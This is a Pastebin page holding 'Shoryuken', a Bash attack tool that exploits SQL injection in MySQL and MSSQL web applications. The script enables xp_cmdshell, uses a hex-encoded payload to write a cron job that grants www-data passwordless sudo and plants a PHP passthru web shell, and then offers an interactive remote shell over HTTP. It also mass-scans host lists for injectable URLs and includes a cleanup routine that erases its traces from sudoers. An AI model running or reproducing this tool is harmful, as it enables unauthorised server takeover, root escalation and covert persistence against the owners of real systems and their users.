API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 31st, 2014
184
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 9.09 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2.  
  3. ### Shoryuken by Brute Logic ###
  4.  
  5. version="1.5"
  6. agent="Mozilla/4.0"
  7. timeout=1
  8. option=$1
  9. target=$2
  10. output=$3
  11. www1="c:\inetpub\wwwroot\\"
  12. sh1=$(cat /dev/urandom | tr -cd a-z | head -c 6)".txt"
  13. www2="/var/www/"
  14. sh2=$(cat /dev/urandom | tr -cd a-z | head -c 6)".php"
  15.  
  16. ### Weak Spot ###
  17.  
  18. function WEAK_SPOT {
  19.  
  20. param=$(echo $target | sed 's/.*?//1' | sed 's/.*&//1')
  21. tparam=$(echo $param | sed 's/.*=//1' | tr -cd a-z)
  22.  
  23. if [ -z $tparam ]
  24. then
  25.  q="%20"
  26. else
  27.  q="%27"
  28. fi
  29.  
  30. }
  31.  
  32. ### Cleaning ###
  33.  
  34. function CLEANING {
  35.  
  36. if [ "$ptype" = 'ASP' ]
  37. then
  38.  curl -A $agent -s "$target+exec+xp_cmdshell+%5Bdel%20$www1$sh1%5D" >/dev/null
  39. else
  40.  curl -A $agent "$target_root/$sh2?c=n=\$(sudo+cat+/etc/sudoers|wc+-l);sudo+rm+$www2$sh2;sudo+sed+-i+%22\$n+d%22+/etc/sudoers"
  41. fi
  42.  
  43. echo -e "\n[+] Cleaned."
  44.  
  45. }
  46.  
  47. ### Shell ###
  48.  
  49. function SHELL {
  50.  
  51. target_root=$(echo $target | sed 's/http:\/\///1' | sed 's/\/.*//1')
  52. pre="cd%20.%26%26"
  53. on=0
  54. t=59
  55.  
  56. if [ "$ptype" = 'PHP' ]
  57. then
  58. while [ $t -gt 0 ]
  59. do
  60.   echo -ne "[.] Waiting $((t--)) seconds for shell...\r"
  61.   sleep 1
  62. done
  63. echo -e "[+] Read to go.                                 \n"
  64. fi
  65.  
  66. while [ 1 ]
  67. do
  68.  
  69.  if [ "$ptype" = 'ASP' ]
  70.  then
  71.    read -p "C:\shoryuken> " cmd arg1 arg2 arg3
  72.  else
  73.    read -p "sho@ryuken:~# " cmd arg1 arg2 arg3
  74.   fi
  75.  
  76.   arg1=$(echo $arg1 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
  77.   arg2=$(echo $arg2 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
  78.   arg3=$(echo $arg3 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
  79.  
  80.   case $cmd in
  81.  
  82.             ?) echo -e "[+] Type on/off to display payload or not (default off).\n[+] Append &&echo after echo commands to write to a file.\n";;
  83.     exit|quit) CLEANING
  84.                break;;
  85.            on) echo -e "[+] Payload display is ON.\n"
  86.                on=1;;
  87.           off) echo -e "[+] Payload display is OFF.\n"
  88.                on=0;;
  89.             *) if [ "$cmd" = 'cd' ]
  90.                then
  91.                  pre="$pre$cmd%20$arg1%20$arg2%20$arg3%26%26"
  92.                else
  93.                  if [ "$ptype" = 'ASP' ]
  94.                  then
  95.                    cmd="$pre$cmd%20$arg1%20$arg2%20$arg3"
  96.                    payload="+exec+xp_cmdshell+%5B$cmd>$www1$sh1%5D+--sp_password+"
  97.                  else
  98.                    cmd="$pre%20sudo%20$cmd%20$arg1%20$arg2%20$arg3"
  99.                    payload="$cmd"
  100.                  fi  
  101.  
  102.                  if [ $on = 1 ]
  103.                  then
  104.                    echo -e "[+] Payload: $payload"
  105.                    echo ""
  106.                  fi
  107.  
  108.                  if [ "$ptype" = 'ASP' ]
  109.                  then
  110.                    curl -A $agent -s "$target$payload" >/dev/null
  111.                    output=$sh1
  112.                  else
  113.                    output=$sh2?c=$payload
  114.                  fi
  115.  
  116.                  curl -A $agent "$target_root/$output"
  117.                  echo ""
  118.                fi
  119.  
  120.   esac
  121.  
  122. done
  123.  
  124. }
  125.  
  126. ### Punch ###
  127.  
  128. function PUNCH {
  129.  
  130. WEAK_SPOT
  131.  
  132. mssqli=$(echo "$q+exec+sp_configure+%5Bshow%20advanced%20options%5D,1+reconfigure+exec+sp_configure%5Bxp_cmdshell%5D,1+reconfigure+exec+xp_cmdshell+%5Bwhoami>$www1$sh1%5D+--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")
  133.  
  134. hex=$(echo $www2$sh2 | od -A n -t x1 | sed 's/ //g' | tr -d '\n')
  135. mysqli="$q/*!+into+outfile%22/etc/cron.d/s%22+fields+enclosed+by+0x23+lines+terminated+by+0x0A2A202A202A202A202A20726F6F74202F62696E2F6563686F20277777772D6461746120414C4C3D28414C4C29204E4F5041535357443A20414C4C273E3E2F6574632F7375646F6572732026202F62696E2F726D202F6574632F63726F6E2E642F732026202F62696E2F6563686F20273C3F706870206563686F20706173737468727528245F4745545B635D293B203F3E273E$hex*/#"
  136.  
  137. shoryuken=$(curl -A $agent -s -i "$target$mssqli&$param$mysqli")
  138.  
  139. status=$(echo -e "$shoryuken" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
  140. PHP=$(echo -e "$shoryuken" | grep X-Powered-By | grep PHP)
  141. ASP=$(echo -e "$shoryuken" | grep X-Powered-By | grep ASP)
  142.  
  143. if [ -n "$ASP" ]
  144. then
  145.   ptype="ASP"
  146. else
  147.   ptype="PHP"
  148. fi
  149.  
  150. case $status in
  151.  
  152.   200) echo -e "[!] Punch given (status code 200), enjoy your shell if vulnerable.\n"
  153.        echo -e "[*] Type ? to help.\n"
  154.        SHELL
  155.        break;;
  156.   301) echo -e "[-] Punch dodged (status code 301), review target.";;
  157.   302) echo -e "[-] Punch dodged (status code 301), review target.";;
  158.   404) echo -e "[-] Punch missed (status code 404), review target.";;
  159.   500) echo -e "[-] Punch failed (status code 500), maybe detected.";;
  160.   503) echo -e "[-] Server is down (status code 503), try again.";;
  161.     *) echo -e "[-] An error occurred, review your settings.";;
  162.  
  163. esac  
  164.  
  165. }
  166.  
  167. ### Test ###
  168.  
  169. function TEST {
  170.  
  171. WEAK_SPOT
  172.  
  173. mssqli=$(echo "$q+and+0<(+select+is_srvrolemember+(convert+(char,0x73797361646D696E)));--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")
  174.  
  175. mysqli="$q/*!+and+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d7973716c2f6d792e636e66),0x20,0x3D))+or+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d792e636e66),0x20,0x3D))*/#"
  176.  
  177. req1=$(curl -A $agent --connect-timeout $timeout -s -i "$target" | wc -c)
  178.  
  179. req2=$(curl -A $agent --connect-timeout $timeout -s -i "$target$mssqli&$param$mysqli")
  180. status=$(echo -e "$req2" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
  181. req2=$(echo -ne "$req2" | wc -c)
  182.  
  183. if [ $req1 = 0 -o $req2 = 0 ]
  184. then
  185.   echo -e "[-] Not vulnerable to shoryuken."
  186.   vuln=0
  187. else
  188.   if [ $status = 200 ]
  189.   then
  190.     if [ $req1 = $req2 ]
  191.     then
  192.       echo -e "[!] Target may be VULNERABLE to shoryuken."
  193.       vuln=1
  194.     else
  195.       echo -e "[-] Not vulnerable to shoryuken."
  196.       vuln=0
  197.     fi
  198.   else
  199.       echo -e "[-] It was not possible to test the target."
  200.       vuln=0
  201.   fi
  202. fi
  203.  
  204. }
  205.  
  206. ### List Mode ###
  207.  
  208. function LIST {
  209.  
  210. touch ./$output
  211.  
  212. for line in $(cat $target)
  213. do
  214.   target=$line
  215.   TEST
  216.   if [ $vuln = 1 ]
  217.   then
  218.     echo $target >> ./$output
  219.   fi
  220. done
  221.  
  222. echo -e "\n[+] Found "$(cat $output | wc -l)" vulnerable targets."
  223.  
  224. }
  225.  
  226.  
  227. ### Scan Mode ###
  228.  
  229. function SCAN {
  230.  
  231. try[1]="/?id=1"
  232. try[2]="/index.php?id=1"
  233. try[3]="/default.asp?id=1"
  234. try[4]="/default.aspx?id=1"
  235. try[5]="/article.php?id=1"
  236. try[6]="/article.asp?id=1"
  237.  
  238. touch ./$output
  239.  
  240. for line in $(cat $target)
  241. do
  242.   for n in {1..6}
  243.   do
  244.     scan=$(curl -A $agent --connect-timeout $timeout -s -i "$line/${try[$n]}" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
  245.    
  246.     if [ -z $scan ]
  247.     then
  248.       break
  249.     fi
  250.  
  251.     if [ $scan = 200 ]
  252.     then
  253.       echo -e "[!] Found: $line${try[$n]}"
  254.       echo "$line${try[$n]}" >> $output
  255.     fi
  256.   done
  257. done
  258.  
  259. }
  260.  
  261.  
  262. ### Interactive Mode ###
  263.  
  264. function INTERACTIVE {
  265.  
  266. echo -e "[?] Type target (format: domain/path/page?parameter_to_test=value):"
  267. read t
  268. if [ -z $t ]
  269. then
  270.   echo -e "[-] Target can not be blank, quitting..."
  271.   break
  272. else
  273.   target=$t
  274. fi
  275.  
  276. echo -e "\n[?] Test if it is vulnerable first?\n[1] Yes\n[2] Skip this step\n"
  277. read -s -n 1 v
  278.   case $v in
  279.     1) TEST
  280.        echo -e "\n[?] Continue?\n[1] Yes\n[2] No\n"
  281.        read -s -n 1 v
  282.        case $v in
  283.          1) echo -e "[+] Preparing rising dragon punch...";;
  284.          2) echo -e "[-] Quitting..."
  285.             break;;
  286.          *) echo -e "[-] Invalid option, quitting..."
  287.             break;;
  288.        esac;;
  289.     2) echo -e "[+] Preparing rising dragon punch...";;
  290.     *) echo -e "[-] Invalid option, quitting..."
  291.        break;;
  292.    esac
  293.  
  294. PUNCH
  295.  
  296. }
  297.  
  298. ### Help Menu ###
  299.  
  300. function HELP {
  301.  
  302. echo -e "Author:\n\tBrute Logic (http://about.me/brutelogic) Twitter @brutelogic\n\nDescription:\n\tShoryuken is a tool designed to get full control of poorly configurated web applications with backend DBMS in the same machine. In its current version, it uses SQL injection techniques to own MYSQL and MSSQL hosts when they run as OS user ROOT with application user having file privileges (Linux MySQL) or as DB sysadmin user with DB running as OS user SYSTEM (Windows MSSQL). It is done using the same unique HTTP request, the shoryuken (that means \"rising dragon punch\" in japanese).\n\tAfter successful exploitation, a custom \"shell\" is provided using only port 80 (it will be always there) without need to download anything or relying on firewall's policy.\n\tShoryuken needs curl installed (Debian-like systems: apt-get install curl).\n\nUsage:\n\t./shoryuken$version [OPTION] {TARGET | INPUT_FILE} {OUTPUT_FILE}\n\t=> Rearrange URL if needed to put vulnerable parameter ALWAYS at the end.\n\nOptions:\n\t-h\thelp\n\t-i\tinteractive mode\n\t-p\tdirect punch\n\t-t\ttest mode\n\t-s\tscan from list\n\t-t\ttest from list\n\nExamples:\n\t./shoryuken$version -i\n\t./shoryuken$version -p \"192.168.0.2/test.asp?id=1\"\n\t./shoryuken$version -p \"vuln-site.net/home/news.php?info=text&vuln_param=11230\"\n\t./shoryuken$version -t \"www.example.com/page.php?name=john\"\n\t./shoryuken$version -s hosts.txt mytargets.txt\n\t./shoryuken$version -l mytargets.txt vulnerables.txt"
  303. break
  304.  
  305. }
  306.  
  307. ### BEGIN ###
  308.  
  309. echo -e "[+] Shoryuken $version started.\n"
  310.  
  311. for i in 1
  312. do
  313.   case $option in
  314.   -i) INTERACTIVE;;
  315.   -h) HELP;;
  316.   -l) LIST;;
  317.   -p) PUNCH;;
  318.   -s) SCAN;;
  319.   -t) TEST;;
  320.    *) echo -e "[-] Invalid option, quitting..."
  321.       break;;
  322.   esac
  323. done
  324.  
  325. echo -e "\n[+] Done."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!